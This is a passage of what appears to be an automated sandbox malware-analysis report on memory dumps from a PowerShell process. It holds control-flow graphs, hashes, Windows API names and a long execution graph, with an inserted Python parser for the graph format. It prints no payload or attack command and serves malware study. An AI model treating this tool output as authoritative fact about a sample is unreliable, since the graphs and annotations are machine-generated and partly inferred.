                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 12a4c27ae9b6715851b94f1917f7dd941972b107f0b58b6b4cfa245d3cbbf2b1
                                                                                                                                  • Instruction ID: 911fc704f2e79a6d01194ab0c1b0cdf0752a087dc7935773023d0e500ae6c5e3
                                                                                                                                  • Opcode Fuzzy Hash: 12a4c27ae9b6715851b94f1917f7dd941972b107f0b58b6b4cfa245d3cbbf2b1
                                                                                                                                  • Instruction Fuzzy Hash: B061F77091CB8D8FEB58EF28DC457E97BE0FB59310F14426AE84DC3252CA74E8418B92

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1383 7ffb4adeeb51-7ffb4adeebef 1386 7ffb4adeec4a-7ffb4adeecc7 CreateFileMappingW 1383->1386 1387 7ffb4adeebf1-7ffb4adeec00 1383->1387 1394 7ffb4adeecc9 1386->1394 1395 7ffb4adeeccf-7ffb4adeed0b call 7ffb4adeed27 1386->1395 1387->1386 1388 7ffb4adeec02-7ffb4adeec05 1387->1388 1389 7ffb4adeec07-7ffb4adeec1a 1388->1389 1390 7ffb4adeec3f-7ffb4adeec47 1388->1390 1392 7ffb4adeec1e-7ffb4adeec31 1389->1392 1393 7ffb4adeec1c 1389->1393 1390->1386 1392->1392 1396 7ffb4adeec33-7ffb4adeec3b 1392->1396 1393->1392 1394->1395 1400 7ffb4adeed12-7ffb4adeed26 1395->1400 1401 7ffb4adeed0d 1395->1401 1396->1390 1401->1400
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileMapping
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 524692379-0
                                                                                                                                  • Opcode ID: 4a1c3639e3cf8a9aa8688fab89ea7dbdd658ce8662e2e420601735b85a03d117
                                                                                                                                  • Instruction ID: 74974a9ca44ee43e4163f9f818573719f182cd283a6cbb35153d02d90046194b
                                                                                                                                  • Opcode Fuzzy Hash: 4a1c3639e3cf8a9aa8688fab89ea7dbdd658ce8662e2e420601735b85a03d117
                                                                                                                                  • Instruction Fuzzy Hash: 2D518270618A8C9FEB58EF2CD8467E977E1FB58311F14426AE84EC3251DE75E8418B81

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1420 7ffb4adee7e1-7ffb4adee880 K32GetModuleInformation 1423 7ffb4adee888-7ffb4adee8b7 1420->1423 1424 7ffb4adee882 1420->1424 1424->1423
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InformationModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3425974696-0
                                                                                                                                  • Opcode ID: 18705f005979156a8f7f0d15c66d6fdc21de42a178d7e73a8d376210e0e5039c
                                                                                                                                  • Instruction ID: fffe78858cd21867e1e9b0b10111e9c43a3195a9e55bead125327e2435ae6184
                                                                                                                                  • Opcode Fuzzy Hash: 18705f005979156a8f7f0d15c66d6fdc21de42a178d7e73a8d376210e0e5039c
                                                                                                                                  • Instruction Fuzzy Hash: 6531E871908A1C9FDB18EF9CD8496F9B7E1FBA9311F10426FD009D3651CB746856CB81

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1426 7ffb4adeedc1-7ffb4adeee61 MapViewOfFile 1429 7ffb4adeee69-7ffb4adeee86 1426->1429 1430 7ffb4adeee63 1426->1430 1430->1429
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileView
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3314676101-0
                                                                                                                                  • Opcode ID: aee6d93f0523b90c0af8f9ddb754fb0974d726fd4bd57f8e63aac60b13a164f0
                                                                                                                                  • Instruction ID: 22ffae644b87ff164fa5f9278c542ad85e95cb57a7a8a4f0b73abd7023cace65
                                                                                                                                  • Opcode Fuzzy Hash: aee6d93f0523b90c0af8f9ddb754fb0974d726fd4bd57f8e63aac60b13a164f0
                                                                                                                                  • Instruction Fuzzy Hash: CB21A23191CA4C9FDB18EB5CD8466F9B7E1FB99321F10422ED049D3252CB71A8568B81

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1442 7ffb4b08520f-7ffb4b085264 1445 7ffb4b08526a-7ffb4b085274 1442->1445 1446 7ffb4b085344-7ffb4b0853f5 1442->1446 1447 7ffb4b08528d-7ffb4b085292 1445->1447 1448 7ffb4b085276-7ffb4b085283 1445->1448 1476 7ffb4b0853f8-7ffb4b085409 1446->1476 1477 7ffb4b0853f7 1446->1477 1449 7ffb4b0852e5-7ffb4b0852ef 1447->1449 1450 7ffb4b085294-7ffb4b085297 1447->1450 1448->1447 1455 7ffb4b085285-7ffb4b08528b 1448->1455 1456 7ffb4b0852f1-7ffb4b0852fd 1449->1456 1457 7ffb4b0852fe-7ffb4b085341 1449->1457 1450->1449 1453 7ffb4b085299-7ffb4b08529c 1450->1453 1453->1449 1459 7ffb4b08529e-7ffb4b0852a8 1453->1459 1455->1447 1457->1446 1459->1449 1466 7ffb4b0852aa-7ffb4b0852be 1459->1466 1471 7ffb4b0852c0-7ffb4b0852cd 1466->1471 1472 7ffb4b0852d7-7ffb4b0852e4 1466->1472 1471->1472 1475 7ffb4b0852cf-7ffb4b0852d5 1471->1475 1475->1472 1478 7ffb4b08540c-7ffb4b085494 1476->1478 1479 7ffb4b08540b 1476->1479 1477->1476 1484 7ffb4b08559d-7ffb4b0855f7 1478->1484 1485 7ffb4b08549a-7ffb4b0854a4 1478->1485 1479->1478 1510 7ffb4b085622-7ffb4b08564d 1484->1510 1511 7ffb4b0855f9-7ffb4b085620 1484->1511 1486 7ffb4b0854bd-7ffb4b0854c2 1485->1486 1487 7ffb4b0854a6-7ffb4b0854b3 1485->1487 1490 7ffb4b08553e-7ffb4b085548 1486->1490 1491 7ffb4b0854c4-7ffb4b0854c7 1486->1491 1487->1486 1493 7ffb4b0854b5-7ffb4b0854bb 1487->1493 1494 7ffb4b08554a-7ffb4b085556 1490->1494 1495 7ffb4b085557-7ffb4b08559a 1490->1495 1496 7ffb4b0854ee-7ffb4b0854f2 1491->1496 1497 7ffb4b0854c9-7ffb4b0854e0 1491->1497 1493->1486 1495->1484 1496->1490 1502 7ffb4b0854f4-7ffb4b0854f7 1496->1502 1502->1490 1507 7ffb4b0854f9-7ffb4b0854fc 1502->1507 1507->1490 1509 7ffb4b0854fe-7ffb4b085508 1507->1509 1509->1490 1517 7ffb4b08550a-7ffb4b08553d 1509->1517 1521 7ffb4b085650-7ffb4b085661 1510->1521 1522 7ffb4b08564f 1510->1522 1511->1510 1523 7ffb4b085664-7ffb4b085681 1521->1523 1524 7ffb4b085663 
1521->1524 1522->1521 1526 7ffb4b085684-7ffb4b0856f7 1523->1526 1527 7ffb4b085683 1523->1527 1524->1523 1532 7ffb4b08584f-7ffb4b08588c 1526->1532 1533 7ffb4b0856fd-7ffb4b085707 1526->1533 1527->1526 1547 7ffb4b0858af 1532->1547 1548 7ffb4b08588e 1532->1548 1534 7ffb4b085709-7ffb4b085721 1533->1534 1535 7ffb4b085723-7ffb4b085730 1533->1535 1534->1535 1541 7ffb4b0857f0-7ffb4b0857fa 1535->1541 1542 7ffb4b085736-7ffb4b085739 1535->1542 1544 7ffb4b0857fc-7ffb4b085808 1541->1544 1545 7ffb4b085809-7ffb4b08584c 1541->1545 1542->1541 1546 7ffb4b08573f-7ffb4b085747 1542->1546 1545->1532 1546->1532 1551 7ffb4b08574d-7ffb4b085757 1546->1551 1550 7ffb4b0858b0-7ffb4b0858d2 1547->1550 1552 7ffb4b085890-7ffb4b0858a9 1548->1552 1553 7ffb4b0858ef-7ffb4b085901 1548->1553 1569 7ffb4b0858d4-7ffb4b0858eb 1550->1569 1555 7ffb4b085770-7ffb4b085774 1551->1555 1556 7ffb4b085759-7ffb4b08576e 1551->1556 1568 7ffb4b0858ab-7ffb4b0858ae 1552->1568 1552->1569 1557 7ffb4b085904-7ffb4b085915 1553->1557 1558 7ffb4b085903 1553->1558 1555->1541 1565 7ffb4b085776-7ffb4b085779 1555->1565 1556->1555 1559 7ffb4b085918-7ffb4b085932 1557->1559 1560 7ffb4b085917 1557->1560 1558->1557 1560->1559 1566 7ffb4b0857a0 1565->1566 1567 7ffb4b08577b-7ffb4b08579e 1565->1567 1571 7ffb4b0857a2-7ffb4b0857a4 1566->1571 1567->1571 1568->1547 1568->1550 1569->1553 1571->1541 1575 7ffb4b0857a6-7ffb4b0857b0 1571->1575 1578 7ffb4b0857b2-7ffb4b0857b9 1575->1578 1579 7ffb4b0857c0-7ffb4b0857c9 1578->1579 1580 7ffb4b0857e2-7ffb4b0857ef 1579->1580 1581 7ffb4b0857cb-7ffb4b0857d8 1579->1581 1581->1580 1583 7ffb4b0857da-7ffb4b0857e0 1581->1583 1583->1580
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1522152764.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4b080000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 08feb4fffb80fbab5967ae9f8e46b9a57bd6573eb6c7f46607e2a84f66a4fca9
                                                                                                                                  • Instruction ID: 0a4cfd4f0074a1cd64704a84ea144ae23ac26ca7ab332cc98e9f36d3e49e6e23
                                                                                                                                  • Opcode Fuzzy Hash: 08feb4fffb80fbab5967ae9f8e46b9a57bd6573eb6c7f46607e2a84f66a4fca9
                                                                                                                                  • Instruction Fuzzy Hash: A7427AA2A0DB894FEB96AB3C98156B57FD1EF56211B0841FBD48CC72A3DD08DD09C391

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1646 7ffb4aeb2164-7ffb4aeb2186 1649 7ffb4aeb2288-7ffb4aeb22d0 1646->1649 1650 7ffb4aeb218c-7ffb4aeb2196 1646->1650 1661 7ffb4aeb22f4-7ffb4aeb2314 1649->1661 1662 7ffb4aeb22d2-7ffb4aeb22f3 1649->1662 1651 7ffb4aeb2198-7ffb4aeb21a8 1650->1651 1652 7ffb4aeb21af-7ffb4aeb21ba 1650->1652 1659 7ffb4aeb21c5-7ffb4aeb21de 1651->1659 1660 7ffb4aeb21aa-7ffb4aeb21ad 1651->1660 1657 7ffb4aeb21bc-7ffb4aeb21be 1652->1657 1658 7ffb4aeb21bf-7ffb4aeb21c4 1652->1658 1657->1658 1658->1659 1659->1649 1665 7ffb4aeb21e4-7ffb4aeb21ee 1659->1665 1660->1652 1670 7ffb4aeb231a-7ffb4aeb238e 1661->1670 1671 7ffb4aeb23b1-7ffb4aeb23bb 1661->1671 1662->1661 1667 7ffb4aeb2207-7ffb4aeb2267 1665->1667 1668 7ffb4aeb21f0-7ffb4aeb21fd 1665->1668 1690 7ffb4aeb2269-7ffb4aeb2277 1667->1690 1691 7ffb4aeb227b-7ffb4aeb2287 1667->1691 1668->1667 1677 7ffb4aeb21ff-7ffb4aeb2205 1668->1677 1698 7ffb4aeb2396-7ffb4aeb23ae 1670->1698 1675 7ffb4aeb23c8-7ffb4aeb240a 1671->1675 1676 7ffb4aeb23bd-7ffb4aeb23c7 1671->1676 1677->1667 1690->1691 1698->1671
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a6ee3036e176689fd0a6cb1345e66a24a4d2d222d6ae9da3cf1e969ffe5933a
                                                                                                                                  • Instruction ID: 351484200d2c8ffa8038a3e766e6adc49e721b1d360b9661c2948cab3cdb9425
                                                                                                                                  • Opcode Fuzzy Hash: 9a6ee3036e176689fd0a6cb1345e66a24a4d2d222d6ae9da3cf1e969ffe5933a
                                                                                                                                  • Instruction Fuzzy Hash: 8581F1A294DBC61FE39AFE7C99592643BD5FF56210B2900FAD09CCB1E3D8295C09C352
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1522152764.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4b080000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b217bb87b39952c26eda8a300c035e514912e919f46d5a8426fa6d051162a299
                                                                                                                                  • Instruction ID: 9e2b332175e8cecc80838816f56afe210acacb1db36aaabe6dfa7aa78119b6ab
                                                                                                                                  • Opcode Fuzzy Hash: b217bb87b39952c26eda8a300c035e514912e919f46d5a8426fa6d051162a299
                                                                                                                                  • Instruction Fuzzy Hash: 9A5175A1A0DB8A4FEB96EE3898A46767BD0EF51211B49C0FBD54DCB2E3DD08DC058351

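The control_flow_graph strings above and the execution_graph listing that follows use one flattened adjacency format: a numeric node id, the node's address (a single address or a start-end range), any API or symbol names the node references, and src->dst edge tokens. The parser below is an added example written for this page, not Joe Sandbox's own code; the meaning of the fields, and the treatment of "N API calls" as an annotation rather than a new node id, are inferred from the strings visible in this report (assumption). The two sample inputs are the graph 1420 string from above and the opening of the execution graph, copied from the report, so the example runs offline and lets you ask which nodes touch a given API (for instance K32GetModuleInformation or VirtualQuery) without reading the raw string.

```python
"""Parse Joe Sandbox control_flow_graph / execution_graph adjacency strings.

Added example for this report, not Joe Sandbox code. Field meanings are
inferred from the strings in the report (assumption):
  <id> <addr>[-<addr>] [label ...]   defines a node (block) with optional API labels
  <src>-><dst>                       defines an edge
  <N> API calls                      is an annotation on the current node, not a node id
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    labels: list[str] = field(default_factory=list)  # API names / symbols / annotations


@dataclass
class Graph:
    blocks: dict[int, Block]
    edges: list[tuple[int, int]]


_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_graph(text: str) -> Graph:
    """Turn one flattened graph string into nodes and edges."""
    tokens = text.split()
    if tokens and tokens[0] in ("control_flow_graph", "execution_graph"):
        tokens = tokens[1:]
    blocks: dict[int, Block] = {}
    edges: list[tuple[int, int]] = []
    current: Block | None = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # "39 API calls" annotates the current node; it is not a new node id
        if tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            if current is not None:
                current.labels.append(f"{tok} API calls")
            i += 3
            continue
        # a numeric token followed by an address (range) starts a new node
        if tok.isdigit() and i + 1 < len(tokens):
            r = _RANGE.match(tokens[i + 1])
            if r:
                start = int(r.group(1), 16)
                end = int(r.group(2), 16) if r.group(2) else start
                current = Block(int(tok), start, end)
                blocks[current.node_id] = current
                i += 2
                continue
        # anything else is a label (API name, symbol) on the current node
        if current is not None:
            current.labels.append(tok)
        i += 1
    return Graph(blocks, edges)


def blocks_calling(graph: Graph, api: str) -> list[int]:
    """Node ids whose labels include the given API name."""
    return sorted(b.node_id for b in graph.blocks.values() if api in b.labels)


def entry_blocks(graph: Graph) -> list[int]:
    """Nodes with no incoming edge (function entries / roots of the listing)."""
    targets = {dst for _, dst in graph.edges}
    return sorted(n for n in graph.blocks if n not in targets)


def api_summary(graph: Graph) -> dict[str, list[str]]:
    """Map each API/symbol label to the hex start address of every node referencing it."""
    out: dict[str, list[str]] = {}
    for b in graph.blocks.values():
        for lab in b.labels:
            if lab.endswith("API calls"):
                continue
            out.setdefault(lab, []).append(f"{b.start:x}")
    return out


# Sample inputs copied from this report (graph 1420 and the start of the execution graph).
CFG_1420 = ("control_flow_graph 1420 7ffb4adee7e1-7ffb4adee880 K32GetModuleInformation "
            "1423 7ffb4adee888-7ffb4adee8b7 1420->1423 1424 7ffb4adee882 1420->1424 1424->1423")
EXEC_HEAD = ("execution_graph 9901 290edd040e0 9902 290edd0402d 9901->9902 9903 290edd0407d "
             "VirtualQuery 9902->9903 9904 290edd04097 9902->9904 9905 290edd040e2 GetLastError "
             "9902->9905 9903->9902 9903->9904 9905->9902 7970 290edd0f460 7981 290edd0c318 "
             "EnterCriticalSection 7970->7981 7972 290edd0f470 7973 290edd11a1c 39 API calls 7972->7973")

if __name__ == "__main__":
    for name, raw in (("cfg 1420", CFG_1420), ("execution graph head", EXEC_HEAD)):
        g = parse_graph(raw)
        print(name, "nodes:", len(g.blocks), "edges:", len(g.edges), "entries:", entry_blocks(g))
        for api, addrs in api_summary(g).items():
            print("  ", api, "->", ", ".join(addrs))
```

Run it directly to get a per-graph node/edge count and an API-to-address map; to process the full execution graph, join its wrapped lines with a single space before calling parse_graph, since the report breaks the string only at whitespace.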
                                                                                                                                  Execution Graph

                                                                                                                                   Execution Coverage: 4.4%
                                                                                                                                   Dynamic/Decrypted Code Coverage: 0%
                                                                                                                                   Signature Coverage: 6.9%
                                                                                                                                   Total number of Nodes: 1708
                                                                                                                                   Total number of Limit Nodes: 27
                                                                                                                                  execution_graph 9901 290edd040e0 9902 290edd0402d 9901->9902 9903 290edd0407d VirtualQuery 9902->9903 9904 290edd04097 9902->9904 9905 290edd040e2 GetLastError 9902->9905 9903->9902 9903->9904 9905->9902 7970 290edd0f460 7981 290edd0c318 EnterCriticalSection 7970->7981 7972 290edd0f470 7973 290edd11a1c 39 API calls 7972->7973 7974 290edd0f479 7973->7974 7975 290edd0f487 7974->7975 7976 290edd0f258 41 API calls 7974->7976 7977 290edd0c36c Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 7975->7977 7978 290edd0f482 7976->7978 7979 290edd0f493 7977->7979 7980 290edd0f358 GetStdHandle GetFileType 7978->7980 7980->7975 9097 290edd0f5e0 9100 290edd0f598 9097->9100 9105 290edd0c318 EnterCriticalSection 9100->9105 9106 290edd0fbe0 9107 290edd0fc0a 9106->9107 9108 290edd0cfe0 __std_exception_copy 13 API calls 9107->9108 9109 290edd0fc2a 9108->9109 9110 290edd0d060 __free_lconv_num 13 API calls 9109->9110 9111 290edd0fc38 9110->9111 9113 290edd0cfe0 __std_exception_copy 13 API calls 9111->9113 9114 290edd0fc62 9111->9114 9112 290edd0fc81 InitializeCriticalSectionEx 9112->9114 9115 290edd0fc54 9113->9115 9114->9112 9117 290edd0fc6b 9114->9117 9116 290edd0d060 __free_lconv_num 13 API calls 9115->9116 9116->9114 9118 290edd0c5e8 9119 290edd0c602 9118->9119 9120 290edd0c5ed 9118->9120 9124 290edd0c608 9120->9124 9125 290edd0c64a 9124->9125 9128 290edd0c652 9124->9128 9126 290edd0d060 __free_lconv_num 13 API calls 9125->9126 9126->9128 9127 290edd0d060 __free_lconv_num 13 API calls 9129 290edd0c65f 9127->9129 9128->9127 9130 290edd0d060 __free_lconv_num 13 API calls 9129->9130 9131 290edd0c66c 9130->9131 9132 290edd0d060 __free_lconv_num 13 API calls 9131->9132 9133 290edd0c679 9132->9133 9134 290edd0d060 __free_lconv_num 13 API calls 9133->9134 9135 290edd0c686 9134->9135 9136 290edd0d060 __free_lconv_num 13 API calls 9135->9136 
9137 290edd0c693 9136->9137 9138 290edd0d060 __free_lconv_num 13 API calls 9137->9138 9139 290edd0c6a0 9138->9139 9140 290edd0d060 __free_lconv_num 13 API calls 9139->9140 9141 290edd0c6ad 9140->9141 9142 290edd0d060 __free_lconv_num 13 API calls 9141->9142 9143 290edd0c6bd 9142->9143 9144 290edd0d060 __free_lconv_num 13 API calls 9143->9144 9145 290edd0c6cd 9144->9145 9150 290edd0c4b8 9145->9150 9164 290edd0c318 EnterCriticalSection 9150->9164 9654 290edd10d68 9655 290edd10d8c 9654->9655 9656 290edd07e30 _invalid_parameter_noinfo 8 API calls 9655->9656 9657 290edd10dce 9656->9657 8154 290edd0a86c 8155 290edd0a899 __except_validate_context_record 8154->8155 8171 290edd090e4 8155->8171 8157 290edd0a89e 8158 290edd0a986 8157->8158 8159 290edd0a8f8 8157->8159 8169 290edd0a94c 8157->8169 8161 290edd0a9a5 8158->8161 8193 290edd0978c 8158->8193 8162 290edd0a973 8159->8162 8168 290edd0a91a __GetCurrentState 8159->8168 8159->8169 8167 290edd0a9f4 8161->8167 8161->8169 8196 290edd097a0 8161->8196 8186 290edd09390 8162->8186 8165 290edd0aa9d 8167->8169 8199 290edd09fec 8167->8199 8168->8165 8174 290edd0ad78 8168->8174 8256 290edd09100 8171->8256 8173 290edd090ed 8173->8157 8175 290edd0978c Is_bad_exception_allowed 9 API calls 8174->8175 8176 290edd0ada7 __GetCurrentState 8175->8176 8177 290edd090e4 _CreateFrameInfo 9 API calls 8176->8177 8183 290edd0adc4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8177->8183 8178 290edd0aebb 8179 290edd090e4 _CreateFrameInfo 9 API calls 8178->8179 8180 290edd0aec0 8179->8180 8181 290edd090e4 _CreateFrameInfo 9 API calls 8180->8181 8182 290edd0aecb __FrameHandler3::GetHandlerSearchState 8180->8182 8181->8182 8182->8169 8183->8178 8183->8182 8184 290edd0978c 9 API calls Is_bad_exception_allowed 8183->8184 8281 290edd097b4 8183->8281 8184->8183 8284 290edd093f4 8186->8284 8188 290edd093af __FrameHandler3::FrameUnwindToEmptyState 8288 290edd09300 8188->8288 8191 290edd0ad78 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8192 
290edd093e4 8191->8192 8192->8169 8194 290edd090e4 _CreateFrameInfo 9 API calls 8193->8194 8195 290edd09795 8194->8195 8195->8161 8197 290edd090e4 _CreateFrameInfo 9 API calls 8196->8197 8198 290edd097a9 8197->8198 8198->8167 8292 290edd0af04 8199->8292 8201 290edd0a4b4 8202 290edd0a405 8202->8201 8203 290edd0a403 8202->8203 8345 290edd0a4bc 8202->8345 8206 290edd090e4 _CreateFrameInfo 9 API calls 8203->8206 8204 290edd0a133 8204->8202 8240 290edd0a16b 8204->8240 8210 290edd0a447 8206->8210 8207 290edd0a335 8207->8203 8213 290edd0a352 8207->8213 8214 290edd0978c Is_bad_exception_allowed 9 API calls 8207->8214 8208 290edd090e4 _CreateFrameInfo 9 API calls 8211 290edd0a09a 8208->8211 8210->8201 8357 290edd07e30 8210->8357 8211->8210 8215 290edd090e4 _CreateFrameInfo 9 API calls 8211->8215 8213->8203 8219 290edd0a374 8213->8219 8338 290edd09364 8213->8338 8214->8213 8218 290edd0a0aa 8215->8218 8220 290edd090e4 _CreateFrameInfo 9 API calls 8218->8220 8219->8203 8221 290edd0a38a 8219->8221 8253 290edd0a497 8219->8253 8222 290edd0a0b3 8220->8222 8223 290edd0a395 8221->8223 8226 290edd0978c Is_bad_exception_allowed 9 API calls 8221->8226 8303 290edd097cc 8222->8303 8230 290edd0af9c 9 API calls 8223->8230 8224 290edd090e4 _CreateFrameInfo 9 API calls 8227 290edd0a49d 8224->8227 8226->8223 8229 290edd090e4 _CreateFrameInfo 9 API calls 8227->8229 8232 290edd0a4a6 8229->8232 8233 290edd0a3ab 8230->8233 8231 290edd097a0 9 API calls 8231->8240 8236 290edd0c0b4 14 API calls 8232->8236 8233->8203 8237 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8233->8237 8234 290edd090e4 _CreateFrameInfo 9 API calls 8235 290edd0a0f5 8234->8235 8235->8204 8239 290edd090e4 _CreateFrameInfo 9 API calls 8235->8239 8236->8201 8238 290edd0a3c5 8237->8238 8342 290edd095f8 RtlUnwindEx 8238->8342 8242 290edd0a101 8239->8242 8240->8207 8240->8231 8317 290edd0a72c 8240->8317 8331 290edd09f18 8240->8331 8243 290edd090e4 _CreateFrameInfo 9 API calls 8242->8243 8245 290edd0a10a 
8243->8245 8306 290edd0af9c 8245->8306 8249 290edd0a11e 8313 290edd0b08c 8249->8313 8251 290edd0a491 8371 290edd0c0b4 8251->8371 8253->8224 8254 290edd0a126 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8254->8251 8366 290edd08f38 8254->8366 8257 290edd09118 8256->8257 8258 290edd0911f GetLastError 8256->8258 8257->8173 8268 290edd09a4c 8258->8268 8272 290edd0986c 8268->8272 8273 290edd098b0 __vcrt_FlsAlloc 8272->8273 8279 290edd09956 TlsGetValue 8272->8279 8274 290edd098de LoadLibraryExW 8273->8274 8277 290edd0999d GetProcAddress 8273->8277 8273->8279 8280 290edd09921 LoadLibraryExW 8273->8280 8275 290edd0997d 8274->8275 8276 290edd098ff GetLastError 8274->8276 8275->8277 8278 290edd09994 FreeLibrary 8275->8278 8276->8273 8277->8279 8278->8277 8280->8273 8280->8275 8282 290edd090e4 _CreateFrameInfo 9 API calls 8281->8282 8283 290edd097c2 8282->8283 8283->8183 8287 290edd09422 __FrameHandler3::FrameUnwindToEmptyState 8284->8287 8285 290edd09494 8285->8188 8286 290edd0944c RtlLookupFunctionEntry 8286->8287 8287->8285 8287->8286 8289 290edd09320 8288->8289 8290 290edd0934b 8288->8290 8289->8290 8291 290edd090e4 _CreateFrameInfo 9 API calls 8289->8291 8290->8191 8291->8289 8293 290edd0af29 __FrameHandler3::FrameUnwindToEmptyState 8292->8293 8294 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8293->8294 8295 290edd0af3e 8294->8295 8374 290edd09b74 8295->8374 8298 290edd0af50 __FrameHandler3::GetHandlerSearchState 8377 290edd09bac 8298->8377 8299 290edd0af73 8300 290edd09b74 __GetUnwindTryBlock RtlLookupFunctionEntry 8299->8300 8301 290edd0a04e 8300->8301 8301->8201 8301->8204 8301->8208 8304 290edd090e4 _CreateFrameInfo 9 API calls 8303->8304 8305 290edd097da 8304->8305 8305->8201 8305->8234 8307 290edd0b083 8306->8307 8309 290edd0afc7 8306->8309 8308 290edd0a11a 8308->8204 8308->8249 8309->8308 8310 290edd097a0 9 API calls 8309->8310 8311 290edd0978c Is_bad_exception_allowed 9 API calls 8309->8311 8312 290edd0a72c 9 API calls 8309->8312 
8310->8309 8311->8309 8312->8309 8315 290edd0b0a9 Is_bad_exception_allowed 8313->8315 8316 290edd0b0f9 8313->8316 8314 290edd0978c 9 API calls Is_bad_exception_allowed 8314->8315 8315->8314 8315->8316 8316->8254 8318 290edd0a759 8317->8318 8329 290edd0a7e8 8317->8329 8319 290edd0978c Is_bad_exception_allowed 9 API calls 8318->8319 8320 290edd0a762 8319->8320 8321 290edd0978c Is_bad_exception_allowed 9 API calls 8320->8321 8322 290edd0a77b 8320->8322 8320->8329 8321->8322 8323 290edd0a7a7 8322->8323 8324 290edd0978c Is_bad_exception_allowed 9 API calls 8322->8324 8322->8329 8325 290edd097a0 9 API calls 8323->8325 8324->8323 8326 290edd0a7bb 8325->8326 8327 290edd0a7d4 8326->8327 8328 290edd0978c Is_bad_exception_allowed 9 API calls 8326->8328 8326->8329 8330 290edd097a0 9 API calls 8327->8330 8328->8327 8329->8240 8330->8329 8332 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8331->8332 8333 290edd09f55 8332->8333 8334 290edd0978c Is_bad_exception_allowed 9 API calls 8333->8334 8335 290edd09f8d 8334->8335 8336 290edd095f8 9 API calls 8335->8336 8337 290edd09fd1 8336->8337 8337->8240 8339 290edd09378 __FrameHandler3::FrameUnwindToEmptyState 8338->8339 8340 290edd09300 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8339->8340 8341 290edd09382 8340->8341 8341->8219 8343 290edd07e30 _invalid_parameter_noinfo 8 API calls 8342->8343 8344 290edd096f2 8343->8344 8344->8203 8346 290edd0a4f5 8345->8346 8347 290edd0a708 8345->8347 8348 290edd090e4 _CreateFrameInfo 9 API calls 8346->8348 8347->8203 8349 290edd0a4fa 8348->8349 8350 290edd0a519 EncodePointer 8349->8350 8356 290edd0a56c 8349->8356 8351 290edd090e4 